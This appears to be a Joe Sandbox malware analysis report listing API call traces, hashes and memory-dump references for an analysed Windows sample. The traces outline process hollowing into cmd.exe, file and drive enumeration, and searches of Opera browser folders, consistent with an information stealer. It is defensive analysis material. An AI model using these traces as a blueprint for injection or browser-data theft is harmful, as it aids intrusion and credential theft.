                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\*$K_
                                                                                                                                                                                                                                                    • API String ID: 2636950706-416308430
                                                                                                                                                                                                                                                    • Opcode ID: a92b56f930df125d0ebbf7201293ca731a47f083e58aed1c6272aece546b1ed9
                                                                                                                                                                                                                                                    • Instruction ID: 6f9789cf2d1545648cf6baece086ff44c10cd08e0d4bd7bb14b227d1d4a51f71
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a92b56f930df125d0ebbf7201293ca731a47f083e58aed1c6272aece546b1ed9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB714BB1D002289FDF61EB60EC49ADD77B8BF44301F0104E6E649A7152EB31AE85CF55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008F57C
                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,000B65A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0008F5A0
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0008F5B2
                                                                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,00000000), ref: 0008F5C4
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0008F5E2
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0008F5F8
                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 0008F608
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,00000000,a-,?,00000000), ref: 0008F627
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0008F65D
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0008F684
                                                                                                                                                                                                                                                    • SetThreadContext.KERNEL32(?,00000000), ref: 0008F696
                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(?), ref: 0008F69F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                                                                                    • String ID: C:\Windows\System32\cmd.exe$a-
                                                                                                                                                                                                                                                    • API String ID: 3621800378-1638984567
                                                                                                                                                                                                                                                    • Opcode ID: b80c1f520e6bbf614baa44d4925fc976767e91f49b05bf204f4c6d7d44999050
                                                                                                                                                                                                                                                    • Instruction ID: 8095cd50dec5f742c029ed30cbada7958bf217cecb1dedabdb79fca3dc9160da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80c1f520e6bbf614baa44d4925fc976767e91f49b05bf204f4c6d7d44999050
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07414872A00209AFEB10AFA4DC85FEAB7B9FF48705F104465FA41EA161E775AD508B21
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,000BA9AC,000BA9B0,000B69FA,000B69F7,00097908,?,00000000), ref: 00081FA4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000BA9B4), ref: 00081FD7
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000BA9B8), ref: 00081FF1
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,000BA9BC,000BA9C0,?,000BA9C4,000B69FB), ref: 000820DD
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000822C3
                                                                                                                                                                                                                                                      • Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00082336
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 000823A2
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 000823B6
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000825DC
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0008264F
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: Sleep.KERNEL32(000003E8,?,?), ref: 00096EFE
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 000826C6
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 000826DA
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 00091D92: GetFileAttributesA.KERNEL32(?,?,?,0008DA7F,?,?,?), ref: 00091D99
                                                                                                                                                                                                                                                      • Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                    • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                                                    • Opcode ID: 97be7001561d0527d13f73c34bcb2097346ced98c06d2ea0b0f6ee4178171074
                                                                                                                                                                                                                                                    • Instruction ID: af7cedec0de3f55ef6fd70f0305d1b3aa710925695b5071b54c217c2eb22bda0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97be7001561d0527d13f73c34bcb2097346ced98c06d2ea0b0f6ee4178171074
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87329431A412299FCF61FB24DC46ACDB3B8BF45304F4141E1A598B7162DB70AF8A9F91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0009546A
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00095481
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B6A80), ref: 000954A2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B6A84), ref: 000954BC
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 0009550D
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00095520
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095534
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00095547
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B6A88), ref: 00095559
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0009556D
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                      • Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00095623
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00095637
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                                                                                                                    • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                                                    • Opcode ID: 6777ed2866c8d99d2995a33f892c4a6bfbba85bc709ef3b029f068ae89469f64
                                                                                                                                                                                                                                                    • Instruction ID: 1f3bf9934fecebd799a50a2389cff895003a1d856f767722230fc7551be33498
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6777ed2866c8d99d2995a33f892c4a6bfbba85bc709ef3b029f068ae89469f64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D512CB1D0021C9BCF60EB60DC89AD9B7BCAB08305F4045E6A608E3251EB319F89CF65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,\*.*,000B682E,0008CC6B,?,?), ref: 0008BFC5
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7470), ref: 0008BFE5
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,000B7474), ref: 0008BFFF
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera,000B6843,000B6842,000B6837,000B6836,000B6833,000B6832,000B682F), ref: 0008C08B
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX), ref: 0008C099
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0008C0A7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                    • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                    • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                                                    • Opcode ID: 9885e983e98e7e076a5ef9144c50b3c07335b1abbb297906a761e7fe11056366
                                                                                                                                                                                                                                                    • Instruction ID: 445167b32a9ef117e3b13aa9b34e699386951c573e583c32586b1167e525afa4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9885e983e98e7e076a5ef9144c50b3c07335b1abbb297906a761e7fe11056366
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7802C0369412299FDF61FB24DD46ADDB7B4BF40300F4141E1E998B7162DB30AE8A9F90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 000951C2
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000951E5
                                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 000951EE
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0009520E
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 00095229
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: wsprintfA.USER32 ref: 00094D1C
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: FindFirstFileA.KERNEL32(?,?), ref: 00094D33
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: _memset.LIBCMT ref: 00094D4F
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: _memset.LIBCMT ref: 00094D60
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: StrCmpCA.SHLWAPI(?,000B69F8), ref: 00094D81
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: StrCmpCA.SHLWAPI(?,000B69FC), ref: 00094D9B
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: wsprintfA.USER32 ref: 00094DC2
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: StrCmpCA.SHLWAPI(?,000B660F), ref: 00094DD6
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: wsprintfA.USER32 ref: 00094DFF
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: _memset.LIBCMT ref: 00094E28
                                                                                                                                                                                                                                                      • Part of subcall function 00094CC8: lstrcatA.KERNEL32(?,?), ref: 00094E3D
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0009524A
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 000952C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
